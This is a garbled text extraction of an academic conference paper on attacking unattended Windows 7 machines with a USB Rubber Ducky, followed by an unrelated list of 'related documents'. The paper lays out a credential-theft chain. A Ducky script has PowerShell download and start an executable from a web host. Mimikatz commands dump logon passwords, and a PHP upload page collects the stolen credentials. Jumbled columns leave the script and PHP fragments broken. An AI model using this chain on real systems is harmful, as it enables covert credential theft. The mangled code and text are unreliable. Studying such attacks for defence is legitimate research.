Hacking Experiment Using USB Rubber Ducky Scripting

3y ago
62 Views
6 Downloads
467.27 KB
6 Pages
Last View : 2m ago
Last Download : 2m ago
Upload by : Oscar Steel
Transcription

Proceedings of The 8th International Multi-Conference on Complexity, Informatics and Cybernetics (IMCIC 2017)Hacking Experiment Using USB Rubber Ducky ScriptingBenjamin CannolesDepartment of CSISUniversity of North GeorgiaDahlonega, GA 30005, USABrcann3389@ung.eduandAhmad GhafarianDepartment of CSISUniversity of North GeorgiaDahlonega, GA 30005, USAAhmad.ghafarian@ung.edudevice that communicates over USB is susceptible to this kindof attack. Moreover, existing USB security solutions, such aswhite listing individual devices by their serial number, are notadequate when considering malicious firmware that can makespurious claims about its identity during device enumeration.ABSTRACTBy leaving your computer unlocked while you are away forseconds can give hackers all the time they need to obtain yourpersonal information from your computer. This paper aims todetail the necessary research and development of a USB RubberDucky script and its implementation to obtain clear text logonid and passwords from a Windows machine, in mere seconds.Each stage is laid out discussing applications of Ducky script,powershell, mimikatz, and re-enabling the vulnerability. Detailsof the attack on Windows 7 operating systems and higher willbe presented.Standard USB devices are too simplistic to reliablyauthenticate. Similarly, secure devices with signed firmwarethat could permit authentication are rare, leaving it unclear howto defend ourselves against this new attack.One can employ various approaches to penetrate a machine as ahacker or a penetration tester such as social engineering,exploiting vulnerabilities of the system, etc. One of the practicalstrategies used by the hackers is to plug in a USB stick to amachine. This can be done by using a USB device detected by avictim's computer as a HID (this is called BadUSB) and runningthe code without the knowledge or consent of the victim. Forexample, if the user is away for lunch and left his or hercomputer unattended, the hacker can plug in the USB in thevictim’s machine for malicious purposes.Keywords: USB Rubber Ducky, hacking, scripting, powershell,mimikatz, and duck tool kit.1. INTRODUCTIONNearly every computer, including desktops, laptops, tablets andSmartphone take input from humans via keyboards. This ispossible because there is a specification with every ubiquitousUSB standard known as Human Interface Device (HID).Practically, this means that any USB device claiming to be akeyboard HID will be automatically detected and accepted bymost modern operating systems including Windows, Mac OS,Linux or Android.Several attempts have been made by researchers to mitigate thedangers of hacking to a machine via BadUSB. One of suchmethods is provided by Vouteva [14]. The author provided aproof of concept for the feasibility and deployment of BadUSBby using an Arduino Micro [15] as a replacement for aBadUSB.The USB interface is generally a dangerous vector for attack. Inmany organizations, use of USB flash drives is restricted [1]due to their potential for being used as a hacking tool ormalware delivery. Examples of USB storage usages to serve asa malware delivery mechanism are provided in various researchpapers including [3, 7, 8, 9]. Recently an even more insidiousform of USB-based attack has emerged known as BadUSB [2,5]. The BadUSB device registers as multiple device types,allowing the device to take covert actions on the host machine.For example, a USB flash drive could register itself as a deviceor a keyboard, enabling the ability to inject malicious scripts.This functionality is present in the Rubber Ducky penetrationtesting tool [4].In this paper, we present the details of our approach inimplementing the penetration into a Windows machine via USBRubber Ducky and scripting. The mechanism allows a hacker toattack an unattended machine and retrieve sensitive informationsuch as user identification and clear text password from thevictim machine. We will utilize several tools and technologiessuch as powershell, mimikatz, scripting language, web serverand Ducky toolkit NG.The rest of this paper is organized as follows. In section 2 wereview the literature. Section 3 covers keylogger enabled USBand other hacking mechanisms related to USB. The tools andtechnologies used in this research are described in section 4.Section 5 details the implementation of our attack method. Theconclusion appears in section 7Unfortunately, because USB device firmware cannot bescanned by the host machine, antivirus software cannot detector defend against this attack. According to the authors in [10]this problem is not just limited to suspect flash drives. Any73

Proceedings of The 8th International Multi-Conference on Complexity, Informatics and Cybernetics (IMCIC 2017)2. LITERATURE REVIEWcommercial keystroke injection attack platform in the business.Combined with its scripting language, malware payloads can bewritten and deployed.In this section we explain some of the previous research in boththe areas of using USB as an attack vector and the mechanismsfor preventing attacks related to USBs.Many people leave their computers unattended, even if only fora few minutes. These few minutes is all it takes for personalinformation to be stolen from the victim’s machine by amalicious hacker using the USB Rubber Ducky or a similardevice. Whether it is a local account or a Microsoft account,vulnerability exists in Windows and many other operatingsystems. Clear text passwords are stored in the computer’smain memory that can be extracted using a program calledMimikatz designed by Benjamin Delpy [22]. One of the manyfunctionality included in mimikatz is the sekurlsa function,which specifically targets logon passwords and hashes.At Black Hat 2015, Nohl and Lell presented USB attackscenarios using a BadUSB [11]. The authors demonstrated thatit is possible to use a USB to redirect the user's DNS queries toan attacker's DNS server. In a related work Kamkar [12] hasshown a Teensy USB microcontroller, configured to install abackdoor and change the DNS settings of an unlocked machine.Recently, another method of using a BadUSB has beendeveloped by Nikhil Mittal (SamratAshok) in a tool calledKautilya [13]. The tool has functionality like informationgathering and script executions which leads to hacking thevictim machine.This research exploits Windows vulnerability utilizing the USBRubber Ducky. In this project the machine has windowsdefender for its antivirus. An account is created on the victim’smachine and all activities are targeting this account. In the nextsection we describe the details of the tools and technologyneeded to construct the malware payload and for launching anattack.With the aim of mitigating the risks posed by USBs, the authorsin [16] built a BadUSB device and tested it in a controlled OSenvironment. Based on the results of their tests, they maderecommendations on how to control the security of a machine.In another published research paper the authors exploitedseveral USB features to establish a rogue HTTP channel used toleak data stored on the device's disk to an Internet back end[17].4. TOOLS ANd TECHNOLOGIESThis section outlines the tools and technologies we used in thisresearch project.To mitigate the dangers of using keylogger enabled USB, theauthors in [18] built a method called USBWall with the aim ofpreventing an attack. The authors compared their USBWallwith other commercially available antivirus products. In theircontrolled environment, they report that USBWall iscomparable to commercial anti-virus software.4.1 Victim’s MachineFor the victim machine we use a physical machine runningWindows 7, 64-bits Ultimate Edition with all patches appliedand having windows defender as the antivirus software.4.2 USB Ducky HardwareWe used a USB Rubber Ducky for attack media (Hak5 [4]), thislooks like a USB flash drive which can be plugged into thevictim’s machine. The average USB Rubber Ducky includes a60MHz programmable microcontroller and a SD slot. Some ofthe features of this device include behaving like a keyboard; itdoes not show in the task manager and its power consumptionmay be revealed by physical measurements.3. USB KEYLOGGINGKeylogger software has the capability to record every keystrokea user makes to a log file. It can record information such as userid, password, instant messages, and e-mail. Detail ofKeyloggers performance and whether they need administrativeaccess to the target machine or not are discussed in [19]. Inrecent years there has been some hardware development thatenhances the task of keylogging. In this section we describe thespecification of one of that hardware that we use in thisresearch.4.3 Scripting LanguageTo write malware payload we use Rubber Ducky scriptinglanguage. Writing scripts can be done from any common texteditor such as Notepad. Each command must be written on anew line all in caps, and may have options follow. Thecommands can invoke keystrokes, key-combos or strings of textas well as offering delays or pauses. The two most commoncommands are DELAY and STRING. DELAY is followed bya number that represents milliseconds. For example, the line“DELAY 2000” instructs the Rubber Ducky to wait 2 fullseconds before proceeding to the next line of code. This isextremely important in making sure the script runs smoothlyand effectively. Since the Ducky is extremely fast, somecomputers may not be able to keep up. This command prohibitsthe Ducky to move faster than the computer will be able tofollow. The STRING command instructs Rubber to process thetext following STRING. It can accept a single or multiplecharacters. Also, the command WINDOWS (or GUI) emulatesthe Windows-key. Figure 1 shows an example of a script [5]which displays Hello World! I am in your PC.The USB Rubber Ducky has been developed by Hak5 [4]. ThisUSB key includes a 60MHz programmable microcontroller andan SD slot. It behaves like a keyboard and it looks like USBflash drives. It can be easily hidden on a computer’s deviceport. Another feature of this device is that it may be hidden inthe task manager; it is assumed that its power consumption maybe revealed by physical measurements. However, to use theUSB Rubber Ducky we need physical access to the victim’smachine and we need to write a malware to be injected into thedevice.Computers inherently trust devices that claim to be a HID. It’sthrough these devices that humans interact with and accomplishtheir daily tasks on all computers including desktops, laptops,tablets, and smart phones. The USB Rubber Ducky is akeyboard emulator disguised within a USB thumb drive case. Ithas been used by IT professionals, penetration testers andhackers since 2010 and has become the most widely used74

Proceedings of The 8th International Multi-Conference on Complexity, Informatics and Cybernetics (IMCIC 2017)a connection to the servers, then copy over sekurlsa.dll and runit. Mimikatz tools run on all versions of Windows from XPforward. However, its functionality is somewhat limited inWindows 10. Below is an example of Mimikatz statements thatneed to be executed in order to look for passwords on a system.privilege::debugSekurlsa::logonpasswords5. HACKING EXPERIMETNThis section details the process of exploiting Windowsvulnerability by creating an attack payload for retrieving user idand password from the victim’s machine. For this project, thevictim machine will be running Windows 7 with windowsdefender as its antivirus.Figure 1- An example of Rubber Script5.1 Using Ducky Script to Create PayloadWe used Ducky scripting, which was introduced in section 4.3and wrote our own malware script in a notepad and saved it as atext file. This text file was then encoded into an inject.bin file.The Following statement converts the script text file to a .binfile.4.4 Duck Toolkit NGThe Duck Toolkit NG is an open source penetration testingplatform that allows users to generate USB Rubber Ducky [23]payloads for use on Windows, Linux, Mac OSX and many otherpopular operating systems. The Duck Toolkit NG allows us touse pre built payloads, create our own payloads and decodeexisting payloads. Using the toolkits require administrativeaccess, powershell, and Internet access.java -jar duckencode.jar -i payload.txt -oinject.bin4.5 PowershellPowershell is an object-oriented programming language andinteractive command line shell for Microsoft Windows.Powershell automates system tasks, such as batch processing,and create systems management tools for commonlyimplemented processes. Figure 2 shows an example ofpowershell for downloading a file from a website and thenexecuting it [6].Once we created the inject.bin file, we injected it onto themicroSD card which was then inserted in the USB RubberDucky hardware. At this point the Ducky is ready for the firstpart of the attack.5.2 Configuring Mimikatz for File Upload/DownloadThe next step is to obtain a copy of the Mimikatz executableand upload to a hosting service of your choosing, or your ownprivate webserver. For this project we chose a Google Driveaccount to upload the executable file. When the file wasuploaded we utilized a direct link generator to obtain thedownload link for the mikimatz as this is how it will downloadand run from powershell. Uploading the credentials were a littlemore in-depth. We created a PHP (Figure 3) page on ourwebsite to listen to the file coming in, and then save it. Thisreceives the file and saves it in the current directory of the PHPfile, with the name ofDELAY 3000GUI rDELAY 100STRING powershell p://example.com/bob.old','%TEMP%\bob.exe');DELAY 100STRING Start-Process "%TEMP%\bob.exe"ENTER“Credentials VictimIPAddress CurrentDatemimikatz.log”.Figure 2-Example of a powershell code4.6 Web ServerSince we are going to execute the malware remotely from theweb, we need a web server with PHP capability to upload anddownload malware executable files. ?php uploadDir ‘Credentials’.” “. SERVER[‘REMOTE ADD’].” ”.date(“Y-m-d H-i-

The average USB Rubber Ducky includes a 60MHz programmable microcontroller and a SD slot. Some of the features of this device include behaving like a keyboard; it does not show in the task manager and its power consumption may be revealed by physical measurements. 4.3 Scripting Language To write malware payload we use Rubber Ducky scripting

Related Documents:

Hacking Concepts 1.10 What is Hacking? 1.11Who is a Hacker? 1.12 Hacker Classes 1.13 Hacking Phases o Reconnaissance o Scanning o Gaining Access o Maintaining Access o Clearing Tracks Ethical Hacking Concepts 1.14 What is Ethical Hacking? 1.15 Why Ethical Hacking is Necessary 1.16 Scope and Limitations of Ethical Hacking

In-box 1m cable or Jabra 1.8m cable How to connect using Anker PowerLine/Newnex cable USB-A USB-C 3m USB-A to USB-C cable How to connect using Startech USB 3.0/USB 2.0 Startech USB Extender Power Adapter USB-A USB-A USB-C In-box

APC Back-UPS USB USB APC Back-UPS RS USB USB APC Back-UPS LS USB USB APC Back-UPS ES/CyberFort 350 USB APC Back-UPS BF500 USB APC BACK-UPS XS LCD USB APC Smart-UPS USB USB APC Back-UPS 940-0095A/C cables APC Back-UPS 940-0020B/C cables APC Back-UPS 940-0023A cable APC Back-UPS Office 940-0119A cable APC Ba

Chapter 7 Passwords In This Chapter Identifying password vulnerabilities Examining password-hacking tools and techniques Hacking operating system passwords Hacking password-protected files Protecting your systems from password hacking P assword hacking is one of the easiest and most common ways attack-ers obtain unauthorized network, computer, or application access.

Hacking The Wild: Desert Island Castaway Survival Series Marathon Hacking The Wild: Escape from Death Valley Hacking The Wild: Deadly Glacier Hacking The Wild: Alaskan Ice Forest Hacking The Wild: Black Bayou, The Hacking The Wild: Desert Island Castaway

Chapter 7 Passwords In This Chapter Identifying password vulnerabilities Examining password-hacking tools and techniques Hacking operating system passwords Hacking password-protected files Protecting your systems from password hacking P assword hacking is one of the easiest and most common ways attack-ers obtain unauthorized network, computer, or application access.

private sectors is ethical hacking. Hacking and Ethical Hacking Ethical hacking can be conceptualized through three disciplinary perspectives: ethical, technical, and management. First, from a broad sociocultural perspective, ethical hacking can be understood on ethical terms, by the intentions of hackers. In a broad brush, ethical

4. USB 2.0 connector Connect USB-compatible devices, such as a USB keyboard, USB mouse, USB storage device, or USB printer. 5. USB 3.2 connector Gen 1 Connect USB-compatible devices, such as a USB keyboard, USB mouse,